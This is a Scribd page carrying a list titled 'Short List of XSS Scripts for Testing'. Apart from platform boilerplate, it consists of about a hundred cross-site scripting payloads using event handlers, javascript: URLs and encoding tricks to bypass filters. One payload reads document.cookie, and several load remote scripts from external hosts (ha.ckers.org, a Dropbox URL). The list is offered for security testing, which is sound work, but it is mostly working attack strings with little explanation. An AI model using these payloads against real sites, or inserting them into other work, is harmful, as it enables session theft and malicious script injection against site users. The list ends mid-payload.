Scribd
Upload
164 views4 pages

Short List of XSS Scripts For Testing

This document contains a list of different XSS (cross-site scripting) scripts that can be used for testing purposes. Many of the scripts involve inserting JavaScript code, such as alert(1) or prompt(1), into elements like <svg>, <script>, <iframe>, and <img> tags in ways that bypass input filtering. The goal is to find ways of executing JavaScript on a page through exploiting vulnerabilities like DOM-based XSS.

Uploaded by

Bala
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as DOCX, PDF, TXT or read online on Scribd
164 views4 pages

Short List of XSS Scripts For Testing

This document contains a list of different XSS (cross-site scripting) scripts that can be used for testing purposes. Many of the scripts involve inserting JavaScript code, such as alert(1) or prompt(1), into elements like <svg>, <script>, <iframe>, and <img> tags in ways that bypass input filtering. The goal is to find ways of executing JavaScript on a page through exploiting vulnerabilities like DOM-based XSS.

Uploaded by

Bala
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as DOCX, PDF, TXT or read online on Scribd
You are on page 1/ 4

Short List Of XSS Scripts for Testing :

<svg onResize svg onResize="javascript:javascript:alert(1)"></svg onResize>

<svg onload=eval(location.hash.slice(1)>#alert(1)

<svg onload=innerHTML=location.hash>#<script>alert(1)</script>

<button ' onclick=alert(1)//>*/alert(1)//

<html ontouchstart=alert(1)>

<html ontouchend=alert(1)>

<script>alert(1)</script>

<script src=javascript:alert(1)>

<script>alert(1)//

<script>alert(1)<!–

<x onclick=alert(1)>click this!

<x oncopy=alert(1)>copy this!

<x onmousemove=alert(1)>hover this!

<x onmouseout=alert(1)>hover this!

<body onhelp=alert(1)>press F1! (MSIE)

<body onscroll=alert(1)>

<svg onload=alert`1`>

<svg onload=alert&lpar;1&rpar;>

"onmouseover=alert(1)//

"autofocus/onfocus=alert(1)//

<img src="x:ö" title="onerror=alert(1)//">

<img src="x:? title=" onerror=alert(1)//">

<IMG SRC=x onpageshow="alert(String.fromCharCode(88,83,83))">

<IMG SRC=x onpopstate="alert(String.fromCharCode(88,83,83))">

<IMG SRC=x onresize="alert(String.fromCharCode(88,83,83))">

<IMG SRC=x onstorage="alert(String.fromCharCode(88,83,83))">

<IMG SRC=x onunload="alert(String.fromCharCode(88,83,83))">

<IFRAME SRC="javascript:alert('XSS');"></IFRAME>
<IFRAME SRC=# onmouseover="alert(document.cookie)"></IFRAME>

/|\\ <script //|\\ src='https://dl.dropbox.com/u/13018058/js.js'> //|\\ </script //|\\

</font>/<svg><style>{src&#x3A;'<style/onload=this.onload=confirm(1)>'</font>/</style>

<script x> alert(1) </script 1=2

<div/onmouseover='alert(1)'> style="x:">

<--`<img/src=` onerror=alert(1)> --!>

<script>javascript:alert(1)</script\x0D

<script>javascript:alert(1)</script\x0A

<script>javascript:alert(1)</script\x0B

<a href="javas\x05cript:javascript:alert(1)" id="fuzzelement1">test</a>

<a href="javas\x0Bcript:javascript:alert(1)" id="fuzzelement1">test</a>

'`"><\x3Cscript>javascript:alert(1)</script>

'`"><\x00script>javascript:alert(1)</script>

ABC<div style="x:\xE2\x80\x82expression(javascript:alert(1)">DEF

ABC<div style="x:\x0Bexpression(javascript:alert(1)">DEF

<a href="\x20javascript:javascript:alert(1)" id="fuzzelement1">test</a>

<a href="\x13javascript:javascript:alert(1)" id="fuzzelement1">test</a>

`"'><img src=xxx:x \x09onerror=javascript:alert(1)>

`"'><img src=xxx:x \x0Conerror=javascript:alert(1)>

<script\x0D>javascript:alert(1)</script>

<script\x0A>javascript:alert(1)</script>

<? foo="><script>javascript:alert(1)</script>">

<! foo="><script>javascript:alert(1)</script>">

<img \x00src=x onerror="javascript:alert(1)">

<img src\x09=x onerror="javascript:alert(1)">

<!--[if]><script>javascript:alert(1)</script -->

<!--[if<img src=x onerror=javascript:alert(1)//]> -->

<IMG SRC="javascript:javascript:alert(1);">

<IMG SRC=javascript:javascript:alert(1)>
<IMG SRC=&{javascript:alert(1);};>

<a href="jav&#65ascript:javascript:alert(1)">test1</a>

<a href="jav&#97ascript:javascript:alert(1)">test1</a>

<IMG SRC="jav&#x09;ascript:alert('XSS');">

<IMG SRC="jav&#x0A;ascript:alert('XSS');">

/*iframe/src*/<iframe/src="<iframe/src=@"/onload=prompt(1) /*iframe/src*/>

<iframe/src \/\/onload = prompt(1)

<iframe/onreadystatechange=alert(1)

<img src ?itworksonchrome?\/onerror = alert(1)

<svg><script>//&NewLine;confirm(1);</script </svg>

'';!--"<XSS>=&{()}

'>//\\,<'>">">"*"

'); alert('XSS

//--></SCRIPT><SCRIPT>alert(String.fromCharCode(88,83,83));

>"><ScRiPt%20%0a%0d>alert(561177485777)%3B</ScRiPt>

&lt;IMG SRC=JaVaScRiPt:alert(&apos;XSS&apos;)&gt;

&lt;IMG SRC=javascript:alert(&amp;quot;XSS&amp;quot;)&gt;

&lt;SCRIPT SRC=http://ha.ckers.org/xss.js

&lt;SCRIPT SRC=//ha.ckers.org/.j&gt;

<;IMG DYNSRC=";javascript:alert(';XSS';);";>;

<;IMG LOWSRC=";javascript:alert(';XSS';);";>;

<IMG SRC="javascript:alert('XSS')"

<iframe src=http://ha.ckers.org/scriptlet.html <

<<SCRIPT>alert("XSS");//<</SCRIPT>

"};alert(23);a={"a":

“x:expr/**/ession(alert(1))”

"};alert(23);a={"a":

`"'><img src=xxx:x \x27onerror=javascript:alert(1)>

`"'><img src=xxx:x \x20onerror=javascript:alert(1)>


"`'><script>\x3Bjavascript:alert(1)</script>

<DIV STYLE="background-image: url(javascript:javascript:alert(1))">

<DIV STYLE="width:expression(javascript:alert(1));">

<INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');">

<BODY BACKGROUND="javascript:alert('XSS')">

<IMG DYNSRC="javascript:alert('XSS')">

<IMG LOWSRC="javascript:alert('XSS')">

<iframe src=j&NewLine;&Tab;a&NewLine;&Tab;&Tab;v&NewLine;&Tab

You might also like